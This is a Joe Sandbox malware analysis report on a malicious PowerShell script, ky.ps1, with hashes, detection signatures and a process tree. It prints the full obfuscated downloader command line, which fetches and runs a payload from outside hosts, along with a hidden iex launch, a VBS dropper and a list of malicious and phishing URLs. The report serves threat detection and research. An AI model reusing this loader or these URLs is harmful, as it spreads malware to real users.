Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
ky.ps1

Overview

General Information

Sample name:ky.ps1
Analysis ID:1569004
MD5:0276aaa9676e9e7293e7fbcb7dbeee12
SHA1:1c0c259085b10d6f8a44be03c9c1461276413f68
SHA256:987ca7478b3233506fd13038a184d7da51984f8e73e9913306b27c853245b885
Tags:Listofrequireditemsps1user-JAMESWT_MHT
Infos:

Detection

Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Yara detected Powershell download and execute
AI detected suspicious sample
Loading BitLocker PowerShell Module
Obfuscated command line found
Powershell creates an autostart link
Sigma detected: Potentially Suspicious PowerShell Child Processes
Sigma detected: Script Interpreter Execution From Suspicious Folder
Sigma detected: Suspicious PowerShell Parameter Substring
Sigma detected: WScript or CScript Dropper
Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
Suspicious execution chain found
Suspicious powershell command line found
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Wscript starts Powershell (via cmd or directly)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Potential Binary Or Script Dropper Via PowerShell
Sigma detected: Suspicious Scan Loop Network
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Very long command line found

Classification

Process Tree

  • System is w10x64
  • powershell.exe (PID: 4904 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • conhost.exe (PID: 3620 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 616 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vh27dw.vbs'" MD5: 04029E121A0CFA5991749937DD22A1D9)
    • wscript.exe (PID: 6964 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
      • powershell.exe (PID: 2724 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$FrankgA.romlE,ponoThirdbVar,eaC eckl Angi:FurfuPFolliaBj.rgr BrneaSy pllMgli a ugerlD,nceiNonteaClosk=.epid$SkovgU DyslnGasliyMelaetsnesetDubbaiT,dtag Ov.rsIm.untAgrar. RejosP cnopKnaldlUdstriEnalitusik,( Comb$AfblnDA.iseePer,gaquiltkBountt.arnaighanevIntuieFremfr Impie Hu.gnUheldd LufteAto a) Sile ');sanktionjtr (gaardspladsens 'Ty,hl[Re.roNGa.teeAnskutNedsa.LilleS Forde Ind rMechovHistriBronzcUdvinejalo,PQualio wi niT ksan Tr.mtTra.iMToldva U.henDe phaSpansgHybrieDecarrBottl]Inder:Mi.un:UntraSst vse B,gvcInd auGietirLselyikva,ttLout.yTamanPArgierFjo.toAnmartIntero LigncUnsweo He slFgte Sigh.=Profe Sexga[R.klaNGged eBuddhtCyclo. SpheSsto.leRetaxcBijouuMessirRugnii,lidft KalvyKo mePPligtrHurraoChar tPaintoH.drac SelmoAur.clpulicTBa.isyRetropSkulle Be r]Multi:im.fs:Lsel Tta celmobilsNodia1 ejs2Chart ');$Unyttigst=$Paralalia[0];$Sportshelt= (gaardspladsens 'Urinv$ ,onog Di,ul.osanoNondibvrts,aDaughlOrtho:Ek alHGoa taHirude m.ldmFraukoUnintpContar inteotomogtDereieArbeju UdensLeu.o5Una.a3Snown=scopiNLiskae Undewbalda- .limOIntimbH enejF,ktoeJack.c Ps ctSpini Lab,SFa.veyLodsns.peletSaurueFejl.mKr kk.Scal NB.screHoftetFlers.Prin,WLiti,e uwarbv,ndiCUpbuilUnsigiBel ne Causn akset');$Sportshelt+=$Udsmeltningen[1];sanktionjtr ($Sportshelt);sanktionjtr (gaardspladsens ' alvf$P.risHLaerea,raineEskadm Foreoco,iop FortrNynazo Misdt Hexye PhotuKahausFl.ve5Ne.ro3dixli.SabbaH sveseF,revaLiljedIndspe P adrFuglesPreim[Gsac $Mas.iFSkovta Paasn PoolgAntifsK,pittTili,k Panin,iheni MetavLqwbee Gir,nTri.isExend]Overa= Fisk$EretrFSkviso Fla rEnsemlElaf nConteg SkrueAirstl ErfasTypeaeUnderr O.hasPlayb ');$Frstepladserne=gaardspladsens 'Upres$trideHRe veaPhysieStannmMinstoNondupIlma rmuseto Damptpr.geeImidouBommesHuman5No,ex3Uaktu. CyniDInklioTranswSigisnSm.rtlBeclooSemica Vindd Uno.FUp,igi Bilil KataeP,ash(Til a$SpdbrURestin,enziyAst ot rndstlkkeriKalkbgUncoms D.satA,lur, Selv$ArbitSStrafv .jereLuskejPochosCawineAuspirTypehePs.ud)Mm.rl ';$Svejsere=$Udsmeltningen[0];sanktionjtr (gaardspladsens 'Stand$,ytotgVarkal Tr,aoBoxlibCebriaBehanlMobil:wormsRAmm,nePunits Isdee Heiim Ste,bM.cerlGrentaAcetab askl FiceeCo.on=Recon(hofmaT,ndreeStu fsElekttpickp- ButtPUnempaFunktt Adr hdegra B nkr$Barn.STt.ekvThyroeCout.j SarasTibbie S ndrUdsp.ePrimu)Vasif ');while (!$Resemblable) {sanktionjtr (gaardspladsens 'Mango$ IliogArb jlCombpo Gipsbfi keaB,litl and:BacciU InornMazareUfat lDramaa Ulf.bDampso tormrAktena Acidt Bokoe S.nslMalocyvelli=Fa gl$BlacktPennyr Brumu.akfjeH pog ') ;sanktionjtr $Frstepladserne;sanktionjtr (gaardspladsens ' Ga,eSAnoretSmasha,ildvr,oncetForci-StillSLinjelformue Moboe Skrap Skif aller4Nicke ');sanktionjtr (gaardspladsens ' Grap$Falkegm,ctulAppelo AnlgbForstaTory,l Tine:ElectR Slideamatrs Dre e SvavmDelinblivsrlSatyraThomibUdskilCocree wird=adapi(ReamuTKseb.eUnives A,detGhett-GhettP OrgaaPa.hytWasseh Amat .eolp$veterSIndvivAm,uleTra.sjM sstsDuffieO nirr rgfoe Forb)Outa. ') ;sanktionjtr (gaardspladsens 'Lgter$IndopgAimlelro tio CorcbOuts.aT.glvlArrhy:PulchVOlie,eHomeonFre.sufo,gasA cohhIntera.upidaMonarrMaske= Uhde$GriflgSvinal,eekeo FilmbOchera D.lelagfas: epokKMa mil Loudoallots emoneArriltSkidtt handeUfordrVulgan UnrueTakhas Coff+Newfa+qu,ry%Spise$KitteP AfplaAstigrEarboaPersplFa ilaExsanl Srvei U staPorta.TangecCompoo Mlkeu,olban overt Blod ') ;$Unyttigst=$Paralalia[$Venushaar];}$Relationsnavne=334162;$Fraflytter=29582;sanktionjtr (gaardspladsens 'Falu $ crosgSerielUnfenoRefrib ElspaMelanlFrame:P,votNGonotoAnsjons ptldDiseqiC pyrsS.lfus riftiSc,urpTekstaSlikmt Aa,eeLykkedRubrilAf,ejytrilr besky=Spiru .etskG SynseMaskit Subs-materCHustao.defonAnsvatMil.beSkuern B.rgtAppea Ploug$SemaeSSuspevM dlaePassejSprins Rac,ePlonkrAdmiteSound ');sanktionjtr (gaardspladsens 'Inapp$Marsigblon lAr,tho SkolbBedstaOp uslCoccy:OvergSSkorzuFireap GlazeOpmunrDal,ts Wiene .nrec No.crFl.mme rudttOmk aiP,admo OvarnScree Udvi=St,an V st[amen SStammyGenres KvabtAmo,peS.rafmSmitt.Un,ipCRespioFi,tnnPr grv Poc eG,naerSamdetcoope]hinde:Kompr:KrykhFGlendrPolyeoB.tonmVed,rBGersoaAnacas StineNon.e6 Tidl4RivalS isket.atchr bsiti rikenaltrigGenae(Co.ka$IncitNMisimothu,nnHaanddH.vegiUnr.vsSandbsWomaniKosyspProteaMaskit re.reVal,dd HulklHo,edyFet,r)Svov. ');sanktionjtr (gaardspladsens 'Ka.kv$Ko,plg ,adelLimi.oCa cibUgenna UmenlLithi: BourAMetacrSekune Gurso Ha,dg Sup rD.staaSubsipOp.rvhpik,me oldorkonom Monst=Garni Scabr[D bleSUdtynyTapiosA.hudtBekose.edemmMarti.DibleTNeur,e S,gexSubautmorp .SkrifEDe epn SkadcMicrooPar gdF,gseiProdunBlomsgRecom]Milor:Ypsil:AngloANo.anSexarcCDriftI Ey pICadis.UnmilG acaneGuldstMurexSm rgitEft rrUdatei An inAttaigIsole(Uds.r$InterSIndisu.rtmapU,chaeTriazrTlpersFrstee Laerc oplr ObpyeNegrotUnc,nixenoloPlintnNonid)W nds ');sanktionjtr (gaardspladsens 'Bedre$Shan g misbl ingeoVestubKoorda Pettl.bebo: Nystn Quira ntipcikorh HalltB,conh MelaeProvenBoff.iRea dcAgate=deskt$ Kil,A EfterHool.e MechoAr ejgChastrHylstaUnnotpTurrihForudeA,rsdrNatur. SlhusBoissuou,lib,ventsDo.umtUnebrrGledeiFldstnHortegSvige(Lgdom$FodboRCam teForlol AnveaFoldetA.onyiCon,eoCo panTvrersPolitnSkspoa Th,uvRelegn Smele To k,Phase$EjendF kl,arServiaAllitf AfmulTyre.yAntiotOcta.tHonnreDigenrKaard)Petro ');sanktionjtr $naphthenic;" MD5: 04029E121A0CFA5991749937DD22A1D9)
        • conhost.exe (PID: 6036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • cmd.exe (PID: 3384 cmdline: "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Succesfulde.blo && echo t" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
Process Memory Space: powershell.exe PID: 4904JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
    Process Memory Space: powershell.exe PID: 2724JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

      Other

      SourceRuleDescriptionAuthorStrings
      amsi64_4904.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
        amsi64_2724.amsi.csvJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Potentially Suspicious PowerShell Child Processes
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4904, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , ProcessId: 6964, ProcessName: wscript.exe
          Sigma detected: Script Interpreter Execution From Suspicious Folder
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4904, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , ProcessId: 6964, ProcessName: wscript.exe
          Sigma detected: Suspicious PowerShell Parameter Substring
          Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vh27dw.vbs'", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vh27dw.vbs'", CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4904, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -win hidden =iex "[Environment]::GetEnvironmentVariable('public') + '\\vh27dw.vbs'", ProcessId: 616, ProcessName: powershell.exe
          Sigma detected: WScript or CScript Dropper
          Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4904, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , ProcessId: 6964, ProcessName: wscript.exe
          Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
          Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4904, TargetFilename: C:\Users\Public\f3j.vbs
          Sigma detected: Change PowerShell Policies to an Insecure Level
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1", ProcessId: 4904, ProcessName: powershell.exe
          Sigma detected: Potential Binary Or Script Dropper Via PowerShell
          Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 4904, TargetFilename: C:\Users\Public\f3j.vbs
          Sigma detected: Suspicious Scan Loop Network
          Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter Anetholes Klosetternes Venushaar Paralalia Unyttigst Stokkemetoder Scanted129 Loftrum243 Nondissipatedly Smashendes Sammenlignings Areographer Articulant Prossies Vesiculating Supermishap Adolfine Prostyle Exerted Torsken Vespoid Svejsere Frotteers Kvrulanter';If (${host}.CurrentCulture) {$Bellisserne++;}Function gaardspladsens($Agerendes){$Dafter135=$Agerendes.Length-$Bellisserne;$Unburden='SUBsTRI';$Unburden+='ng';For( $Unminimizing=5;$Unminimizing -lt $Dafter135;$Unminimizing+=6){$Anetholes+=$Agerendes.$Unburden.Invoke( $Unminimizing, $Bellisserne);}$Anetholes;}function sanktionjtr($Epigyne){ . ($Emanciperingerne) ($Epigyne);}$Forlngelsers=gaardspladsens 'Ol erMTyvekoDi.elzCoenoi Fronl Heldl.nfusaNatro/E.cam5Unbri.Avlsh0Koord Fo.b(Po.omW AcceiFravrnAmentd UnpuoRealkw ZoonsMyxom .ejsN .hudTRecor Unend1Turne0,npow.Zymoc0Dacty;Predo F,skeWantipiSeptinGu,gn6Kundg4Brn,b;Colla Overixforsy6Af ta4 Malt;Fo.ew LawserPrepov Kom,:Barnl1for e2Incom1Tom,t.te,eo0Alloc)B.ytk Vill,G Skyte Retrc kldnk MaveoChili/L.tre2Redis0Nazil1Tling0C rci0Zitta1Trkas0Nonco1 Slu SelecFM.ssaiSkyd rSi ine ampf .ostochevixDemob/trodd1und.r2Ser m1Earmu.Stra,0Exagg ';$Fangstknivens=gaardspladsens 'ImparUPremosaromaeBallar Unfr-Lect,APliengRipo,e ExcenRubritDefin ';$Unyttigst=gaardspladsens 'Afvrgh DanstAllestH.stepKommesbevi,: K.nt/Dosme/ forgwIter.wPal mwNeur..HouslaVagarlC ccymKlovnr HemawAnnelaSkjerd.ndta. SvrvcUnkinoSultampimps/,tammwparanh Skva/Sp.ckSUnin,uLo hibOrgieoStorkrSamtadOptrniTap.lnResuneCommerPaxone,hapenGowlkdPingeeRokkes,usti7Affld8Unem..,eadmsUnharmde eniV,nre>MicrohForlotSteretKniplpKonklsTillg:Lingu/Rengr/ Dimyw SusiwBreg.w,onst. Samle DomsrGgepupArgui-appelrn,rmaoOpryky Ethea AkkrlGarvk-Protoc kandrNo.atoFe tswfejlmnMesop. DecaiEmbaln irkefResteoAnh l/ CifrwChanchAttak/,adioS Alaru.ountbIndlsoParaprpian.d Scrai ThornS.ptieFin.irK ntaeChantnVegetd FingeI,glosGuden7 Bekr8abrik.,ydrosKri sm lddeiM.tte ';$Deaktiverende=gaardspladsens 'panor> atol ';$Emanciperingerne=gaardspladsens 'Bru.hiBlideeRut,exFyl e ';$Almengjordes='Loftrum243';$Cometlike = gaardspladsens ' H lvequ,drcRespohsura,oSniff Teser%Subcha Klunpkun.tptaagedFlotaaCr.sst TvanaCox c%D.mss\AurunS nforuSkrmscSv jncAiz,eeGreensAnthof FjeruDisjolVeksedLitogeBlod.. Sub,bCentrlTeksto olle Lati&Ultra&Tamar SandieOphthct ndah C.gaoAfplu FamiltSlidb ';sanktionjtr (gaardspladsens 'Isos.$ImpregArri.lTombaoRossabGast aSo,thlPrede:.eserUHanged DisksautoomSbeopeKontolWretctIncrenBerigiMenzinO,eirgDed gePurifn Ho o=W ter( Gam,cReto.m excadEloin Unch/ Ami cAllit Rekvi$OboleC StavoSuppemSevereUnmantThromlOghamiCes,ok RekoeUdmaa) exp, ');sanktionjtr (gaardspladsens 'Nouve$Fra
          Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
          Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1", ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4904, ParentProcessName: powershell.exe, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\Public\f3j.vbs" , ProcessId: 6964, ProcessName: wscript.exe
          Sigma detected: Non Interactive PowerShell Process Spawned
          Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1", CommandLine|base64offset|contains: z, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4004, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noLogo -ExecutionPolicy unrestricted -file "C:\Users\user\Desktop\ky.ps1", ProcessId: 4904, ProcessName: powershell.exe

          Suricata Signatures

          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2024-12-05T10:45:05.484643+010028033053Unknown Traffic192.168.2.649747184.171.244.231443TCP

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Antivirus / Scanner detection for submitted sample
          Source: ky.ps1Avira: detected
          Antivirus detection for URL or domain
          Source: https://www.erp-royal-crown.info/wh/SubordinerenAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerendAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerendeAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: http://www.erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordineAvira URL Cloud: Label: phishing
          Source: https://www.pineappletech.ae/na/mg.vbsAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/Avira URL Cloud: Label: phishing
          Source: https://www.fornid.com/wh/List%20of%20required%20items%20and%20services.pdfAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/SubordAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.smiAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/wh/SubordinereAvira URL Cloud: Label: phishing
          Source: https://www.almrwad.com/wh/Subordinerendes78.smiAvira URL Cloud: Label: malware
          Source: https://www.erp-royal-crown.info/whAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SuborAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordiAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SuboAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinerendesAvira URL Cloud: Label: phishing
          Source: http://erp-royal-crown.infoAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78.sAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/SubordinAvira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes78Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/wh/Subordinerendes7Avira URL Cloud: Label: phishing
          Source: https://www.erp-royal-crown.info/Avira URL Cloud: Label: phishing
          Multi AV Scanner detection for submitted file
          Source: ky.ps1ReversingLabs: Detection: 34%
          AI detected suspicious sample
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 97.1% probability
          Source: unknownHTTPS traffic detected: 93.95.216.175:443 -> 192.168.2.6:49709 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 91.193.42.13:443 -> 192.168.2.6:49715 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 184.171.244.231:443 -> 192.168.2.6:49728 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 148.251.114.233:443 -> 192.168.2.6:49763 version: TLS 1.2
          Source: Binary string: ion.pdbXI source: powershell.exe, 00000000.00000002.2376849387.00000256F9F80000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.2180268531.000001C49BB9B000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: System.Management.Automation.pdb~ source: powershell.exe, 00000006.00000002.3477541721.0000028A6DF3F000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.2374596360.00000256F9D60000.00000004.00000020.00020000.00000000.sdmp
